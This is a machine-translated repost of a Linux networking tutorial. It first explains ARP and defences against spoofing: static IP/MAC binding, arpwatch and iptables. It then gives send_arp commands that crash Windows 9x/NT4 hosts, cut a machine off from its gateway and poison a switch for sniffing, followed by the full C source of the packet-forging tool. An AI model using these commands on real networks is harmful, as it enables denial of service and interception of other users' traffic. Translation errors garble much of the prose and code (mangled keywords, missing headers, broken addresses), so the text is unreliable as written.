(1) Using IP->MAC binding (static ARP) may solve this problem.
For arp spoofing attacks,
Static binding ip and mac addresses on linux servers:
#/usr/sbin/ARP-s192.168.0.254 * *: * * *: * * * (it's your own network card MAC, which Ifconfig will see).
In this way, when the server is attacked by arp spoofing, the mac address of 192. 168.0.254 will not be modified. When other computers query the mac of this ip, it will answer correctly. But at this time, other computers are also under attack, so each computer's arp cache will have the mac address of 192 5438+068.0.254, so it will not send out arp queries, but directly use this forged mac address, so these computers will still not find the gateway to access the Internet.
Therefore, you need to find out the attacker in the local area network. Run tcpdump, dsniff or arpwatch on the server (recommended). Find out who is carrying out the arp spoofing attack (man will know the details at once). You can also collect mac addresses, numbers, lists and control rights of all machines. When you encounter a spoofing attack, just ping the attacked IP, then arp -a, find the mac address of the attacked IP, corresponding to your mac list, and then ...
You can also turn on ip forwarding by default on each machine, so you can surf the Internet even if you are cheated, but those who send passwords in clear text, such as telnet, are easily sniffed.
Reprinted "Linux realizes ip and mac binding"/article/OS/Linux/200312/266.html.
In some systems, there is a demand that some IP addresses in the intranet are connected to the Internet, but it is hoped that these IP addresses will not be stolen by illegal users. This can be achieved by the following solutions:
First, use ipchains or iptables to set that only legitimate IP addresses are allowed to connect.
Establish IP/Mac binding for legal IP. To discuss this problem, we need to understand the working principle of ARP protocol, which is the abbreviation of address resolution protocol. Its function and working principle are as follows:
In the underlying network communication, if two nodes want to communicate with each other, they must first know the MAC addresses of the source and the target. In order to let the system quickly find the MAC address of the remote node, each local kernel keeps an instant lookup table (called ARP cache). There is a list in ARP that maps the IP address of a remote host to its corresponding MAC address. Address Resolution Protocol (ARP) cache is a data structure that resides in memory, and its contents are managed and maintained by the kernel of the local system. By default, the IP addresses (and corresponding MAC addresses) of nodes with which the local system has communicated in the past ten minutes are kept in the ARP cache.
When the MAC address of the remote host exists in the ARP cache of the local host, there is no problem to convert the IP address of the remote node into the MAC address. However, in many cases, the MAC address of the remote host does not exist in the local ARP cache. What will the system do? When the IP address of the remote host is known, but the MAC address is not in the local ARP cache, the following process is used to obtain the MAC address of the remote node: the local host sends a broadcast packet to all nodes in the network and asks if there is a corresponding IP address. One node (only one) will reply to this ARP broadcast message. The MAC address of the remote host will be included in the response packet. After receiving this return packet, the local node will record the MAC address of the remote node in the local ARP cache.
If we set the IP/mac correspondence to be fixed, that is, we set the static mac correspondence for those legal IP addresses, even if illegal users steal IP addresses, linux routers will not ask their MAC addresses through arp protocol when responding to connection requests sent by these IP addresses, but use the static MAC addresses established by Linux and send response data, so that those who steal IP will not get response data and cannot use network services.
The method of establishing static IP/MAC binding is to establish /etc/ether file, which contains the correct IP/MAC correspondence, and the format is as follows:
192. 168.2 . 32 08:00 4E:B0:24:47
Then /etc/rc.d/rc.local, and finally add:
arp -f
Just do it.
2.4 iptables of the kernel can restrict both IP and Mac, and use this function to restrict the IP address and Mac address of legal IP rules.
(2)
Attacked machine: 10.5.4. 178.
Hardware address: 52:54:4C:98:EE:2F.
My machine:: 10.5.3.69
Hardware address: 52:54:4C:98:ED:C5.
Gateway: 10.5.0.3
Hardware address: 00:90:26:3D:0C:F3
Machine on the other port of the switch: 10.5.3.3
Hardware address: 52:54:4C:98:ED:F7.
One: crack the screen saver of WINDOWS with ARP.
Principle: The level of IP conflict is higher than that of screen saver. When there is a conflict, it will
Jump out of the screen saver.
Key: the number of ARP packets is appropriate.
[root@sztcww tools]#。 /send _ ARP 10 . 5 . 4 . 178 00:90:26:3D:0C:F3 \
2F 40 minutes
Two: the use of ARP causes IP conflicts and crashes.
Principle: WINDOWS 9X and NT4 can't handle IP conflicts, resulting in a crash.
Note: For WINDOWS 2K, LINUX is equivalent to flooding, but it is better than ordinary flooding.
Much more effective. For LINUX, the system is obviously slow.
[root@sztcww tools]#。 /send _ ARP 10 . 5 . 4 . 178 00:90:26:3D:0C:F3 \
2F 999999999
Thirdly, using ARP to cheat the gateway will cause a computer in the LAN to leave the gateway.
Principle: use ARP reply packet to refresh the corresponding machine so that it can't go out.
[root@sztcww tools]#。 /send _ ARP 10 . 5 . 4 . 178 52:54:4C:98:EE:22 \
10 . 5 . 4 . 178 00:90:26:3D:0C:F3 1
Note: If the above command is only valid for a few seconds, the ARP in the gateway machine
The attacked machine will refresh the cache correctly, so as long as ...
Four: Deceive the switch with ARP, and you can monitor the machine at the other end of the switch.
You may need to modify send_arp.c to construct the following packets.
ethhdr
srchw:52:54:4C:98:ED:F7 ->dst HW:FF:FF:FF:FF:FF:FF:FF:FF proto:806h
arphdr
HW type: 1 protol:800h HW _ size:6 pro _ size:4 op: 1
Editor: F7 Intellectual Property: 10.5.3.3
d _ ha:00:00:00:00:00:00:00d _ IP: 10 . 5 . 3 . 3
Then you can smell it.
Principle:
Switches have the function of memorizing MAC addresses. It maintains a list of MAC addresses and their slogans.
So you can do an ARP trick first, and then you can listen.
However, it should be pointed out that after spoofing, the same MAC address has two port numbers.
Ge Yuan said, "This is actually a competition issue."
It seems that after ARP, it will have a little impact on the whole network, but I am not sure.
Since it is a competition, monitoring can only monitor a part, unlike monitoring under the same hub.
This will affect the listener because he has lost some data.
Of course, there are other applications that need the cooperation of other technologies.
The following is the source program of send_arp.c
Code:
/*
The program sends out an ARP packet with the source/destination IP.
And the Ethernet hardware address uploaded by the user. it
Compile and work on Linux, or possibly in any
Unix with SOCK_PACKET. [e-mail] volobuev @ t1.chem.umn.edu [/email]
*/
# Including
# Including
# Including
# Including
# Including
# Including
# Including
# Including
# Including
# Including
# Including
# Including
# Including
# Including
# Definition ADDR EN 6 Federal Institute of Technology
# define IP _ ADDR _ EN 4
# define ARP_FRAME_TYPE 0x0806
# Define ETHER_HW_TYPE 1
# define IP_PROTO_TYPE 0x0800
# define OP_ARP_REQUEST 2
#define OP_ARP_QUEST 1
# Define the default device "eth0"
Char usage[] = {"send_arp: Send a custom arp packet. Yuri Volobuyev
Usage: send _ arpsrc _ IP _ addrsrc _ HW _ addtarg _ IP _ addrtar _ HW _ addrnumber "};
Structure arp _ packet
{
u _ char targ _ HW _ addr[ETH _ HW _ ADDR _ LEN];
u _ char src _ HW _ addr[ETH _ HW _ ADDR _ LEN];
U _ short frame _ type;
u _ short hw _ type
u _ short prot _ type
u _ char hw _ addr _ size
u _ char prot _ addr _ size
u _ short op
u _ char sndr _ HW _ addr[ETH _ HW _ ADDR _ LEN];
u _ char sndr _ IP _ addr[IP _ ADDR _ LEN];
u _ char rcpt _ HW _ addr[ETH _ HW _ ADDR _ LEN];
u _ char rcpt _ IP _ addr[IP _ ADDR _ LEN];
u _ char padding[ 18];
};
Empty mold (char *);
void get_ip_addr (struct in_addr *,char *);
void get_hw_addr (char *,char *);
int main (int argc,char * argv[])
{
struct in_addr src_in_addr,targ_in_addr
Structure arp _ packet pkt
struct sockaddr sa
int sock
int j,number
If (argc! = 6)
Die (usage);
sock = socket(AF_INET,SOCK_PACKET,htons(ETH _ P _ RARP));
if(sock & lt; 0)
{
Perror ("socket");
Exit (1);
}
number = atoi(argv[5]);
PKT . FRAME _ TYPE = htons(ARP _ FRAME _ TYPE);
PKT . HW _ TYPE = htons(ETHER _ HW _ TYPE);
PKT . prot _ TYPE = htons(IP _ PROTO _ TYPE);
PKT . HW _ addr _ size = ETH _ HW _ ADDR _ LEN;
PKT . prot _ addr _ size = IP _ ADDR _ LEN;
PKT . OP = htons(OP _ ARP _ QUEST);
get_hw_addr(pkt.targ_hw_addr,argv[4]);
get_hw_addr(pkt.rcpt_hw_addr,argv[4]);
get_hw_addr(pkt.src_hw_addr,argv[2]);
get_hw_addr(pkt.sndr_hw_addr,argv[2]);
Get the ip address (& ampsrc_in_addr, argv [1]);
Get the ip address (& targ _ in _ addr, argv [3]);
memcpy(pkt.sndr_ip_addr,& ampsrc_in_addr,IP _ ADDR _ LEN);
memcpy(pkt.rcpt_ip_addr,& amptarg_in_addr,IP _ ADDR _ LEN);
bzero(pkt.padding, 18);
strcpy(sa.sa_data,DEFAULT _ DEVICE);
for(j = 0; j {
if (sendto(sock,& ampsizeof(pkt),0 & amp; sa,sizeof(sa))& lt; 0)
{
perror(“send to”);
Exit (1);
}
}
Exit (0);
}
Empty mold (character * string)
{
fprintf(stderr," %s\n ",str);
Exit (1);
}
void get _ IP _ addr(struct in _ addr * in _ addr,char *str)
{
struct hostent * hostp
in _ addr-& gt; s _ addr = inet _ addr(str);
if(in _ addr-& gt; s_addr == - 1)
{
if ((hostp = gethostbyname(str)))
bcopy(hostp-& gt; h_addr,in_addr,hostp-& gt; h _ length);
Otherwise {
Fprintf(stderr, "send_arp: unknown host %s\n", str);
Exit (1);
}
}
}
void get_hw_addr (char *buf,char *str)
{
int I;
char c,val
for(I = 0; I & ltETH _ HW _ ADDR _ Aaron; i++)
{
If (! (c = tolower(*str++)))
Die ("invalid hardware address");
if (isdigit(c))
val = c-' 0 ';
else if(c & gt; = ' a ' & amp& ampc & lt= 'f ')
val = c-' a '+ 10;
other
Die ("invalid hardware address");
* buf = val & lt& lt4;
If (! (c = tolower(*str++)))
Die ("invalid hardware address");
if (isdigit(c))
val = c-' 0 ';
else if(c & gt; = ' a ' & amp& ampc & lt= 'f ')
val = c-' a '+ 10;
other
Die ("invalid hardware address");
* buf++ | = val;
if (*str == ':')
str++;
}
}